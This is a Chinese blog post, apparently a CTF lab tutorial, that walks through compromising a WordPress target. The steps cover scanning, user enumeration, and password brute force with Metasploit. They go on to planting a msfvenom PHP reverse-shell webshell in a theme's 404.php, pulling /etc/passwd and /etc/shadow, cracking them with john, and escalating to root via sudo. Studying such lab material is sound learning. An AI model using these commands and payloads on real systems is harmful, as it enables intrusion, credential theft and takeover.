6-6CTF夺旗入门教程--暴力破解

最新推荐文章于 2024-07-24 19:27:48 发布
最新推荐文章于 2024-07-24 19:27:48 发布
阅读量963 收藏 2
点赞数
分类专栏: CTF学习 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105892770
版权
1.信息探测

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.108
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.108
#探测敏感信息
nikto -host http://192.168.2.108
dirb http://192.168.2.108

2.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
由于服务器跳转的页面无法访问,尝试制定解析到IP
http://vtcsec/secret/wp-login.php

#编辑hosts文件,制定域名解析到靶场IP
gedit /etc/hosts
192.168.2.108   vtcsec
3.暴力破解

对登录网页进行用户名探测
(kali中的wpscan打不开不知道为什么)

wpscan --url vtcsec/secret/ --enumerate u

用户名探测为admin

msfconsole
>use auxiliary/scanner/http/wordpress_login_enum
>set username admin
>set pass_file /usr/share/wordlists/dirb/common.txt
>set targeturi /secret/
>set rhosts 192.168.2.108
>run

结果:
在这里插入图片描述

4.上传webshell获取控制权

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444

twentyseventeen 的404.php可以上传webshell
监听4444端口

> use exploit/multi/handler 
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.2.110
> run

执行shell,获取反弹shell

http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php

查看系统信息,用户权限
在这里插入图片描述

5.root权限

利用返回shell下载

download /etc/passwd
download /etc/shadow

将文件转换为john可识别的格式

unshadow passwd shadow > cracked

使用john破解密码

john cracked

在这里插入图片描述

启动终端

python -c "import pty;pty.spawn('/bin/bash')"
#登录用户
su - marlinspike
#提权
sudo -l
sudo bash
6.总结

提权时可以抓取/etc/passwd和/etc/shadow,之后使用john来破解对应密码,使用用户名密码提权
对于wp渗透中,启动对应的主题,在404页面上传webshell

The Riddler.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-MISC-基础破解-WP
single7_的博客
11-23 1661
0x01 思路 下载获得文件后解压获得基础破解rar文件 由于压缩文件格式为 rar,如果使用伪加密的方式那么rar打开时会报错,因此可以确定该文件没有使用伪加密。 下载 压缩文件密码破解工具 使用后调整选项,开始破解,破解后获得密码为 2563 使用密码 2563 打开压缩文件,解压获得 flag.txt,得到一串字符。 判断为 base64 加密字符,将获得的字符进行解密获得 flag flag{70354300a5100ba78068805661b93a5c} ...
CTF入门指南
baikeng3674的博客
02-05 5663
转自http://www.cnblogs.com/christychang/p/6032532.html ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web密码学pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据reverse 逆向windows...
【建议收藏】CTF网络安全夺旗赛刷题指南(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
07-24 667
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
6-8CTF夺旗入门教程--命令执行
高冷的宅先生
05-04 678
1.命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容时,会用到一些执行系统命令的函数。 如php中的system、exec、shell_exec等 当用户可以控制命令执行函数中的参数时,将可以注入 恶意系统命令到正常命令中,造成命令执行攻击 调用这些函数执行系统命令时,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有过滤用户输入的情况下,就会造成命令执行漏洞 2. 信息探测 #扫描主...
CTF 入门指导教程
12-04
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
CTF夺旗赛.pdf
11-16
CTF夺旗赛.pdf
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Write-up:CTF撰写和信息
03-21
在CTF-Write-up-main这个压缩包中,可能包含了多个CTF Write-up文档,每个文档都详细记录了一个或多个挑战的解题过程。这些文档可以作为学习资料,帮助初学者了解不同类型的CTF挑战,熟悉解题流程,并且学习如何分析...
stripe-ctf-2.0:夺旗
05-19
压缩包文件"stripe-ctf-2.0-master"很可能包含了所有挑战的源代码和相关资源。通过分析这些代码,我们可以学习到如何设计安全挑战,了解攻击者可能会使用的技巧,同时也能提高自己的防御能力。例如,开发者可能会...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
BUUCTF 基础破解
Charles_Andrew的博客
10-29 1055
解压出来是一个含加密的压缩包,text题目也说的说清楚了是四位数字,所以直接使用ARCHPR进行暴力破解。 得出来密码是2563,输入文件后就可以得到(密码) 为什么打括号呢?因为这密码是base64加密过的,所以我们还需要找个base64解密的网站进行解码,就得到了flag. ...
ctf工具Nmap使用教程图文教程(超详细)
程序员小麦的博客
06-24 679
kali的命令行中可以直接使用 nmap 命令,打开一个「终端」,输入 nmap 后回车,可以看到 nmap 的版本,证明 nmap 可用。
CTF题目合集
cgygsw的博客
01-26 2709
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
CTF工具下载(上)
yifijhjh的博客
10-14 7388
CTF工具下载,这里是一小部分,后期会陆续分享
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 259
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
网络安全CTF夺旗赛入门到入狱-入门介绍篇
2201_75735270的博客
09-25 948
flag是指一串具有一定格式的字符串或其他内容,flag可能来自于一台远端的服务 器,一个复杂的软件,也可能隐藏在一段通过密码算法或协议加密的数据,或是一 组网络流量及音频视频文件中。选手需要综合利用自己掌握的安全技术,并辅以快 速学习新知识,通过获取服务器权限,分析并破解软件或是设计解密算法等不限定 途径来获取flag。CTF攻防模式。
解密开展夺旗(CTF)竞赛前需要了解的十大问题
yy1715713348的博客
07-03 2285
解密开展夺旗(CTF)竞赛前需要了解的十大问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值